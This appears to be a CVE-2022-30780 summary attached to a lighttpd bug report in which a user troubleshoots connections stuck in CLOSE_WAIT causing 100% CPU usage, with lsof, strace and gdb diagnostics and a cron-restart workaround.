Headline
CVE-2022-30780: Bug #3059: Connections stuck in Close_Wait causing 100% cpu usage - Lighttpd
Lighttpd 1.4.56 through 1.4.58 allows a remote attacker to cause a denial of service (CPU consumption from stuck connections) because connection_read_header_more in connections.c has a typo that disrupts use of multiple read operations on large headers.
Hello folks,
I’ve run into an odd issue with some of the simple web servers we run (they serve some text in index.html). Specifically, it seems like there are connections that get stuck in close_wait and eat up 100% of CPU resources.
To note, these are 1 core VMs we run this on.
This issue started when we updated from lighttpd 1.4.55-2 to 1.4.57-1. I am going to provide full context on what was done in case it helps. Initially after this upgrade, I noticed that the service stopped starting up and saw these warnings:
2021-01-13 20:21:21: (configfile.c.2269) server.upload-dirs doesn’t exist: /var/cache/lighttpd/uploads
2021-01-13 20:21:21: (plugin.c.195) dlopen() failed for: /usr/lib/lighttpd/mod_openssl.so /usr/lib/lighttpd/mod_openssl.so: cannot open shared object file: No such file or directory
2021-01-13 20:21:21: (server.c.1238) loading plugins finally failed
and:
2021-01-13 20:21:21: (configfile.c.253) Warning: please add “mod_openssl” to server.modules list in lighttpd.conf. A future release of lighttpd 1.4.x will not automatically load mod_openssl and lighttpd will not use SSL/TLS where your lighttpd.conf contains ssl.* directives
So I went in and edited /etc/lighttpd/lighttpd.conf and added mod_openssl and installed the lighttpd-mod-openssl package. That resolved the issue with the service not running.
After this point, the servers ran normally for a while, then we got an alert about CPU usage. Taking a look it seemed like lighttpd was constantly consuming the entire core. Luckily enough, it still seemed to be accepting connections normally (as far we we could tell from access.log and errors.log didn’t show anything out of the ordinary).
At this point, looking at lsof, it showed the following (with some stuff deleted of course):
mitd:~$ sudo lsof -p 157648
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
lighttpd 157648 www-data cwd DIR 254,1 4096 2 /
lighttpd 157648 www-data rtd DIR 254,1 4096 2 /
lighttpd 157648 www-data txt REG 254,1 375136 1966696 /usr/sbin/lighttpd
lighttpd 157648 www-data mem REG 254,1 23160 1967130 /usr/lib/x86_64-linux-gnu/libnss_cache.so.2.0
lighttpd 157648 www-data mem REG 254,1 51696 1968527 /usr/lib/x86_64-linux-gnu/libnss_files-2.31.so
lighttpd 157648 www-data mem REG 254,1 14408 1844237 /usr/lib/lighttpd/mod_staticfile.so
lighttpd 157648 www-data mem REG 254,1 30792 1841268 /usr/lib/lighttpd/mod_dirlisting.so
lighttpd 157648 www-data mem REG 254,1 3076960 1967430 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.1
lighttpd 157648 www-data mem REG 254,1 593696 1967535 /usr/lib/x86_64-linux-gnu/libssl.so.1.1
lighttpd 157648 www-data mem REG 254,1 22600 1835392 /usr/lib/lighttpd/mod_accesslog.so
lighttpd 157648 www-data mem REG 254,1 55520 1839916 /usr/lib/lighttpd/mod_openssl.so
lighttpd 157648 www-data mem REG 254,1 14408 1843016 /usr/lib/lighttpd/mod_redirect.so
lighttpd 157648 www-data mem REG 254,1 14408 1835607 /usr/lib/lighttpd/mod_alias.so
lighttpd 157648 www-data mem REG 254,1 149608 1968567 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
lighttpd 157648 www-data mem REG 254,1 1839792 1967267 /usr/lib/x86_64-linux-gnu/libc-2.31.so
lighttpd 157648 www-data mem REG 254,1 43048 1966278 /usr/lib/x86_64-linux-gnu/libxxhash.so.0.8.0
lighttpd 157648 www-data mem REG 254,1 257528 1966472 /usr/lib/x86_64-linux-gnu/libnettle.so.8.0
lighttpd 157648 www-data mem REG 254,1 18688 1968044 /usr/lib/x86_64-linux-gnu/libdl-2.31.so
lighttpd 157648 www-data mem REG 254,1 464848 1967316 /usr/lib/x86_64-linux-gnu/libpcre.so.3.13.3
lighttpd 157648 www-data mem REG 254,1 14408 1835248 /usr/lib/lighttpd/mod_access.so
lighttpd 157648 www-data mem REG 254,1 14408 1842895 /usr/lib/lighttpd/mod_indexfile.so
lighttpd 157648 www-data mem REG 254,1 177928 1966929 /usr/lib/x86_64-linux-gnu/ld-2.31.so
lighttpd 157648 www-data 0u CHR 1,3 0t0 7949 /dev/null
lighttpd 157648 www-data 1u CHR 1,3 0t0 7949 /dev/null
lighttpd 157648 www-data 2u unix 0xffff98ddb1b31800 0t0 1393254 type=STREAM
lighttpd 157648 www-data 3w REG 0,23 7 1393271 /run/lighttpd.pid
lighttpd 157648 www-data 4u IPv4 1393272 0t0 TCP *:http (LISTEN)
lighttpd 157648 www-data 5u IPv6 1393273 0t0 TCP *:http (LISTEN)
lighttpd 157648 www-data 6u IPv4 1393274 0t0 TCP *:https (LISTEN)
lighttpd 157648 www-data 7u IPv6 1393275 0t0 TCP *:https (LISTEN)
lighttpd 157648 www-data 8w REG 254,1 3423240 3670309 /var/log/lighttpd/error.log
lighttpd 157648 www-data 9w REG 254,1 117697465 3670308 /var/log/lighttpd/access.log
lighttpd 157648 www-data 10u a_inode 0,13 0 7868 [eventpoll]
lighttpd 157648 www-data 11u IPv4 1586902 0t0 TCP #####:https->#####.com:52059 (ESTABLISHED)
lighttpd 157648 www-data 12u IPv4 1435873 0t0 TCP ME.com:https->#####.com:41960 (CLOSE_WAIT)
lighttpd 157648 www-data 13u IPv4 1586953 0t0 TCP .com:https->:59153 (ESTABLISHED)
lighttpd 157648 www-data 19u IPv4 1415541 0t0 TCP ME.com:http->***********.com:43470 (CLOSE_WAIT)
lighttpd 157648 www-data 20r REG 254,1 27 3670597 /var/www/html/index.html
You can see 12u and 19u are both stuck in close_wait. They stayed in that state for hours. An strace of the lighttpd process showed the similar messages to the following spammed repeated:
epoll_ctl(10, EPOLL_CTL_MOD, 12, {EPOLLERR|EPOLLHUP, {u32=1349789952, u64=94078313441536}}) = 0
epoll_ctl(10, EPOLL_CTL_MOD, 12, {EPOLLIN|EPOLLERR|EPOLLHUP|EPOLLRDHUP, {u32=1349789952, u64=94078313441536}}) = 0
getsockopt(21, SOL_TCP, TCP_INFO, "\10\0\0\0\0\4x\0\200 \5\0@\234\0\0\264\5\0\0\264\5\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\231c\1\0\0\0\0\30\231c\1\234\257b\1\334\5\0\0\350\301\0\0007\275\1\0\233\336\0\0\377\377\377\177\n\0\0\0\264\5\0\0\3\0\0\0\0\0\0\0\20r\0\0\0\0\0\0", [104]) = 0
At this point using the following I was able to kill the 12u and 19u specifically after which CPU usage returned to normal and strace stopped showing the previous messages:
gdb -p pid
call (int)close(12)
call (int)close(19)
exit
To mitigate this in the short term, I have setup a cron job to check CPU usage and restart the service if CPU usage is above a percentage.
Any help to get to the bottom of this bug would be appreciated, let me know what other info you may need.